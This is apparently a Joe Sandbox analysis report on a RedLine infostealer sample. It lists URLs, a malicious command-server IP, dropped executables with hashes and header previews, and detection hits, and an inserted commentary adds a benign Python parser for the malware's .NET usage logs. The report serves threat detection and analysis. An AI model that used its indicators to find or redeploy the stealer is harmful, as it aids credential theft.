                                                                        http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssuecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://tempuri.org/Entity/Id1ResponsecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=caQi43qE17.exe, 0000000A.00000002.366074072.0000000003936000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.000000000296F000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000381E000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000383B000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.00000000028E2000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.00000000036E1000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.0000000003919000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000373F000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.00000000038B8000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000389B000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.00000000037BD000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002856000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.00000000027C9000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000395F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedcaQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlycaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplaycaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegocaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinarycaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeycaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressingcaQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssuecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletioncaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trustcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://tempuri.org/Entity/Id10caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://tempuri.org/Entity/Id11caQi43qE17.exe, 0000000A.00000002.364130402.0000000002A0A000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://tempuri.org/Entity/Id12caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://tempuri.org/Entity/Id16ResponsecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://tempuri.org/Entity/Id13caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id14caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id15caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id16caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/NoncecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://tempuri.org/Entity/Id17caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id18caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id5ResponsecaQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id19caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnscaQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://tempuri.org/Entity/Id10ResponsecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RenewcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm8DcaQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://tempuri.org/Entity/Id8ResponsecaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeycaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
IP:193.233.20.24
Domain:unknown
Country:Russian Federation
ASN:8749
ASN Name:REDCOM-AS Redcom Khabarovsk Russia RU
Malicious:true
Joe Sandbox Version:37.0.0 Beryl
Analysis ID:816370
Start date and time:2023-02-27 21:16:43 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 11m 33s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:22
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample file name:file.exe
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@15/10@0/1
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 20.2% (good quality ratio 19.3%)
• Quality average: 85%
• Quality standard deviation: 24%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 147
• Number of non-executed functions: 146
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240s for rundll32
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time:21:18:31
Type:API Interceptor
Description:9x Sleep call for process: caQi43qE17.exe modified
Match:193.233.20.24
Associated samples (Detection; Threat Name):
• uCd7d27ds6.exe (malicious; RedLine)
• t2UyxKXtaO.exe (malicious; Amadey, RedLine)
• 9w1Fu81ONv.exe (malicious; RedLine)
• 0j9E3lKTwq.exe (malicious; RedLine)
• exP35zYwdx.exe (malicious; Amadey, RedLine)
• c5BzxFAhYv.exe (malicious; RedLine)
• Kn783XlJH2.exe (malicious; Amadey, RedLine)
• YoMPnI12pO.exe (malicious; Amadey, RedLine)
• 9NEtsWMHrU.exe (malicious; Amadey, RedLine)
• Z4ljN27ANN.exe (malicious; RedLine)
• MfvWhbfZpK.exe (malicious; RedLine)
• B6sZPv5mnE.exe (malicious; Amadey, RedLine)
• 0NrbwBYXhq.exe (malicious; Amadey, RedLine)
• Dx8NezHn1D.exe (malicious; Amadey, RedLine)
• file.exe (malicious; Amadey, RedLine)
• D9kANbd9Ui.exe (malicious; Amadey, RedLine)
• a2H0BckZji.exe (malicious; Amadey, RedLine)
• NicHOn9d7A.exe (malicious; Amadey, RedLine)
• 7mdq5Msk2Q.exe (malicious; RedLine)
• CXB4nbHURO.exe (malicious; RedLine)
No context
No context
Match:C:\Users\user\AppData\Local\Temp\IXP002.TMP\diIN97YY43.exe
Associated samples (Detection; Threat Name):
• a2H0BckZji.exe (malicious; Amadey, RedLine)
• keUAZCkfIk.exe (malicious; Amadey, RedLine)
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe
                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):226
                                                                                                                                                                                                  Entropy (8bit):5.354940450065058
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                                                                                                                                                                  MD5:B10E37251C5B495643F331DB2EEC3394
                                                                                                                                                                                                  SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                                                                                                                                                                  SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                                                                                                                                                                  SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2843
                                                                                                                                                                                                  Entropy (8bit):5.3371553026862095
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:MIHK5HKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHK1Hl:Pq5qXeqm00YqhQnouOqLqdqNq2qzcGtx
                                                                                                                                                                                                  MD5:E9C2F4CC11CEA097B88D7D224F41A5B3
                                                                                                                                                                                                  SHA1:B16891C1E967E2803C1F994CA61ED82A52233C54
                                                                                                                                                                                                  SHA-256:843CF5780CF7C018F8431C1A69DB910BDC039E48C495A2C854A0C1A9C52CAF82
                                                                                                                                                                                                  SHA-512:2259C7E86AE80AC4CB26AB22FE50295D2C17E45BF31DF0BC3E91BCC9063300616764C1219E9B40A16EED0D2D63035B0EF1ED7B1BDBAEDF9408BF9D46E5A86D48
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Cultu
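The two "CSV text" drops above (written by buze36rj14.exe and caQi43qE17.exe) are .NET CLR usage logs. On a live host the runtime writes the same records under %LOCALAPPDATA%\Microsoft\CLR_v4.0\UsageLogs\<process name>.log; that location is general .NET Framework behaviour and not something this report states. The parser below is an added example, not part of the Joe Sandbox report or of Joe Security's tooling. It runs over the preview text of both logs, reconstructed as separate lines on the assumption that the ".." shown in the preview stands for the CRLF terminators the report mentions, and it reads the record kinds as 1 = runtime environment line, 2 = assembly bound without a native image, 3 = assembly bound to the NGEN image whose path follows. That reading is mine, inferred from the previews, not a documented specification.

```python
"""Parse the .NET CLR usage-log lines from the two "CSV text" drops.

Added example; not code from the Joe Sandbox report. The record-kind meanings
(1 = runtime environment line, 2 = assembly bound with no native image,
3 = assembly bound to the NGEN image whose path follows) are my reading of
the format as shown in the previews, not a documented specification.
"""
from __future__ import annotations

import csv
from dataclasses import dataclass

GUI_ASSEMBLIES = {"System.Windows.Forms", "PresentationCore", "PresentationFramework"}

# Constructed from the report's previews; ".." in the preview is taken to be CRLF.
# The last caQi43qE17.exe record is cut off in the preview and is kept cut off.
LOG_BUZE36RJ14 = "\n".join([
    r'1,"fusion","GAC",0',
    r'1,"WinRT","NotApp",1',
    r'3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0',
])
LOG_CAQI43QE17 = "\n".join([
    r'1,"fusion","GAC",0',
    r'1,"WinRT","NotApp",1',
    r'2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0',
    r'3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0',
    r'3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0',
    r'3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0',
    r'3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0',
    r'3,"WindowsBase, Version=4.0.0.0, Cultu',
])


@dataclass(frozen=True)
class BindRecord:
    kind: int
    name: str    # assembly display name, or "fusion"/"WinRT" for kind-1 lines
    target: str  # native-image path for kind 3, flag text for kind 1, "" for kind 2
    flag: int


def parse_usage_log(text: str) -> tuple[list[BindRecord], int]:
    """Return (records, number of lines skipped as truncated or malformed)."""
    records: list[BindRecord] = []
    skipped = 0
    for line in text.splitlines():
        if not line.strip():
            continue
        try:
            # One csv.reader per line: the assembly display names contain commas
            # and are quoted, so a naive split(",") would break them apart.
            row = next(csv.reader([line]))
            if len(row) == 4:
                rec = BindRecord(int(row[0]), row[1], row[2], int(row[3]))
            elif len(row) == 3:
                rec = BindRecord(int(row[0]), row[1], "", int(row[2]))
            else:
                raise ValueError("truncated record")  # e.g. the cut-off preview line
        except (csv.Error, ValueError):
            skipped += 1
            continue
        records.append(rec)
    return records, skipped


def native_image_bitness(path: str) -> str | None:
    # NGEN images live under NativeImages_v4.0.30319_32 or _64, which tells you
    # which CLR (x86 or x64) the process actually ran under.
    if "NativeImages_v4.0.30319_64" in path:
        return "x64"
    if "NativeImages_v4.0.30319_32" in path:
        return "x86"
    return None


def summarize(text: str) -> dict:
    """Assemblies bound, CLR bitness, and whether a GUI framework was loaded."""
    records, skipped = parse_usage_log(text)
    assemblies = sorted({r.name.split(",")[0] for r in records if r.kind in (2, 3)})
    bitness = {native_image_bitness(r.target) for r in records if r.kind == 3}
    bitness.discard(None)
    return {
        "assemblies": assemblies,
        "bitness": bitness,
        "gui_framework": bool(GUI_ASSEMBLIES & set(assemblies)),
        "truncated_lines": skipped,
    }


if __name__ == "__main__":
    for name, log in (("buze36rj14.exe", LOG_BUZE36RJ14), ("caQi43qE17.exe", LOG_CAQI43QE17)):
        print(name, summarize(log))
```

Run stand-alone, the summary shows what the two raw previews only hint at: buze36rj14.exe bound only System under the 64-bit native-image store, while caQi43qE17.exe ran as a 32-bit process and pulled in System.Windows.Forms, PresentationCore and PresentationFramework, so it carries a WinForms/WPF GUI surface. The skipped-line counter exists because the report truncates the second preview mid-record; on a real host the log is complete and the counter should stay at zero.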
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):179350
                                                                                                                                                                                                  Entropy (8bit):4.9480962176817425
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:6xqZWBJaHEDgXTzzfMK8emA9Xh8fxNn2pU9f2MKTV/wi4lr55R9TxlnsPsUw0jOG:oqZVTPfBbXh
                                                                                                                                                                                                  MD5:32E2EFAFEE3B768A9C4604727D692077
                                                                                                                                                                                                  SHA1:46CE5FD08B40BC203D6B0B9DF1B47185ABCD504F
                                                                                                                                                                                                  SHA-256:C665BE7A74C2C3F38E8EFA0998D6D52668B56287464EA247EA52AE17F91937BE
                                                                                                                                                                                                  SHA-512:08F29ABC146EEB5CC808172BB83545E5F37293E35E9A1A36B9EB5491C7B085DC715B8EE3B4CD90E723AD52138D8D7119BA5E08A43E0F873DBBF697BF4F979064
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe, Author: Joe Security
                                                                                                                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe, Author: ditekSHen
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 74%
• Antivirus: Virustotal, Detection: 69%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............z.... ........@.. ....................... ............@.................................(...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):906240
                                                                                                                                                                                                  Entropy (8bit):7.91223652331673
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:7Mr9y904k1gr1VZEDRkLq/uvrQWQ42Syrq+g3ZclzYwEjVGhWriFj5rgR5+k1F0x:yyT3r0BuvskTy6yMwwAYm5ERw8F4cG
                                                                                                                                                                                                  MD5:D16ACC7C93BF0ECC8BE14CAE8BE1F15A
                                                                                                                                                                                                  SHA1:9E463F325A67401D5966FC8DE612525AFF28356D
                                                                                                                                                                                                  SHA-256:BE5DB62AA39661F851800B909035991F177AA3A277026BDC3015F797EE85B0A0
                                                                                                                                                                                                  SHA-512:E01C1DD40948FA57A48A43F624A4F4CB78259728F31003C95C4D61FE27B6663EA371BC10FDF9ED447BC6C28E6DC15F5E41AACBEE03463B5A58EA90673DFAF6F1
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 54%
• Antivirus: Virustotal, Detection: 47%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d...l......`j............@.......................... ............@...... .......................................M..............................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc....P.......N...|..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):313856
                                                                                                                                                                                                  Entropy (8bit):7.320447473996942
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:h0xQZh23G4D4EFCd7KUGU+NSjclyAFhk68XEMDtRnZeTbE6PfM:h0SZSG4cTKUtvcllh0EcHZG
                                                                                                                                                                                                  MD5:93E470CB72A45CE819FF3EDB9B4A51B3
                                                                                                                                                                                                  SHA1:8F06779116BFAA52497EC079BC6C12C4EF88B68E
                                                                                                                                                                                                  SHA-256:2C0208F12D918E001922D851B78A9C632B4E1959E1AA888BF7EFBA150ECAEE49
                                                                                                                                                                                                  SHA-512:BC9D4583EC9C29D53D59352629BE5378F4D468DB0F0062BC0EC48624BD4F3C34AD7425B14EF27C21A4D6C4FB465A32186C4CDB8982CE8293CC3FAAA1940573D4
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 26%
• Antivirus: Virustotal, Detection: 26%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i .L.NIL.NIL.NI.F.IM.NI#~.IU.NI#~.I".NIEp.IK.NIL.OI#.NI#~.IW.NI#~.IM.NI#~.IM.NIRichL.NI........................PE..L....N.a............................\_.......@....@..................................V.......................................3..P....P..@...........................................................(7..@............................................text....-.......................... ..`.data...P....@.......2..............@....rsrc...@....P......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):676864
                                                                                                                                                                                                  Entropy (8bit):7.865142493950552
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:JMrNy90m6L3OvriWQW2fyoq+gHZclaS4EDVGhbriAj5Fg85+eqFqT:kyXvW6Gyfyr48Axd5+8wfFK
                                                                                                                                                                                                  MD5:A19D601A69B407CED85F6C6E721D0E2C
                                                                                                                                                                                                  SHA1:02C12195F32714198E27AA956EBF09DF5397D3CC
                                                                                                                                                                                                  SHA-256:33940678091A72B7F32492518A6B87F79A573B8BB3BB802621667960D7599B7D
                                                                                                                                                                                                  SHA-512:69153D4B0D783A6F3B932BE8CBADD80BD597B3308F444547BC918975356B0088051A751B2160CE2BA296DF655B43820630D21C5685F5C3D7A01755F14D5F83EE
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@..................................]....@...... ......................................................................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):253952
Entropy (8bit):7.089913840101579
Encrypted:false
